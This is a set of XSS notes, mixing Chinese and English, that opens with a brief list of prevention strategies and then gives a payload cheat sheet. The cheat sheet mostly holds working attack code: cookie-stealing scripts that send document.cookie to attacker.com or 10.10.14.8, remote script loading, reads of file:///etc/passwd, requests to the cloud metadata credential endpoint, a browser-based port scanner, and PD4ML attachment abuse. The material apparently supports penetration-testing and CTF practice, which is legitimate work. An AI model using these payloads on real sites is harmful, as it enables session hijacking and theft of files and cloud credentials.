XSS 笔记
防止 XSS 的策略包括:
- 永远不要相信用户的输入
- 实现输出编码
- 执行用户输入验证
- 遵循纵深防御原则
- 确保 Web 应用程序的开发,与OWASP 的 XSS 检查列表一致
- 修复漏洞后,复测确认
经典利用方式
- src
<script>
var i=new Image();
i.src="http://10.10.14.8/?cookie="+btoa(document.cookie);
</script>
- 通过 XHR
var xhr=new XMLHttpRequest();
xhr.open("GET", "https://10.10.14.8/?"+document.cookie,
true);
xhr.send();
- 重定向到恶意网站
<script>window.location.replace("http://evil.com");</script>
XSS Payload
- 发现类
<!-- Basic discovery, Write somthing-->
<img src="x" onerror="document.write('test')" />
<script>document.write(JSON.stringify(window.location))</script>
<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>
<!--Basic blind discovery, load a resource-->
<img src="http://attacker.com"/>
<img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie">
<script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script>
<link rel=attachment href="http://attacker.com">
- SVG
Any of the previous of following payloads may be used inside this SVG payload. One iframe
accessing Burpcollab subdomain and another one accessing the metadata endpoint are put as
examples.
<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800"
height="500">
<g>
<foreignObject width="800" height="500">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>
<iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
</body>
</foreignObject>
</g>
</svg>
<svg width="100%" height="100%" viewBox="0 0 100 100"
xmlns="http://www.w3.org/2000/svg">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>
<script type="text/javascript">
// <![CDATA[
alert(1);
// ]]>
</script>
</svg>
You can find a lot other SVG payloads in https://github.com/allanlw/svg-cheatsheet
- 路径披露
<!-- If the bot is accessing a file:// path, you will discover the internal path
if not, you will at least have wich path the bot is accessing -->
<img src="x" onerror="document.write(window.location)" />
<script> document.write(window.location) </script>
- 加载外部脚本
The best conformable way to exploit this vulnerability is to abuse the vulnerability to make the
bot load a script you control locally. Then, you will be able to change the payload locally and
make the bot load it with the same code every time.
<script src="http://attacker.com/myscripts.js"></script>
<img src="xasdasdasd" onerror="document.write('<script
src="https://attacker.com/test.js"></script>')"/>
- 读取本地文件
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
x.open("GET","file:///etc/passwd");x.send();
</script>
<script>
xhzeem = new XMLHttpRequest();
xhzeem.onload = function(){document.write(this.responseText);}
xhzeem.onerror = function(){document.write('failed!')}
xhzeem.open("GET","file:///etc/passwd");
xhzeem.send();
</script>
<iframe src=file:///etc/passwd></iframe>
<img src="xasdasdasd" onerror="document.write('<iframe
src=file:///etc/passwd></iframe>')"/>
<link rel=attachment href="file:///root/secret.txt">
<object data="file:///etc/passwd">
<portal src="file:///etc/passwd" id=portal>
<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File:
/etc/passwd" pos-x="195" />
Get external web page response as attachment (metadata endpoints)
<link rel=attachment href="http://http://169.254.169.254/latest/meta-data/iam/security-
credentials/">
- Bot 延时
<!--Make the bot send a ping every 500ms to check how long does the bot wait-->
<script>
let time = 500;
setInterval(()=>{
let img = document.createElement("img");
img.src = `https://attacker.com/ping?time=${time}ms`;
time += 500;
}, 500);
</script>
<img src="https://attacker.com/delay">
- Port Scan
<!--Scan local port and receive a ping indicating which ones are found-->
<script>
const checkPort = (port) => {
fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
let img = document.createElement("img");
img.src = `http://attacker.com/ping?port=${port}`;
});
}
for(let i=0; i<1000; i++) {
checkPort(i);
}
</script>
<img src="https://attacker.com/startingScan">
- SSRF
This vulnerability can be transformed very easily in a SSRF (as you can make the script load
external resources). So just try to exploit it (read some metadata?).
Attachments: PD4ML
There are some HTML 2 PDF engines that allow to specify attachments for the PDF, like
PD4ML. You can abuse this feature to attach any local file to the PDF. To open the attachment
I opened the file with Firefox and double clicked the Paperclip symbol to store the
attachment as a new file. Capturing the PDF response with burp should also show the
attachment in cleat text inside the PDF.
<!-- From https://0xdf.gitlab.io/2021/04/24/htb-bucket.html -->
<html><pd4ml:attachment src="/etc/passwd" description="attachment sample"
icon="Paperclip"/></html>
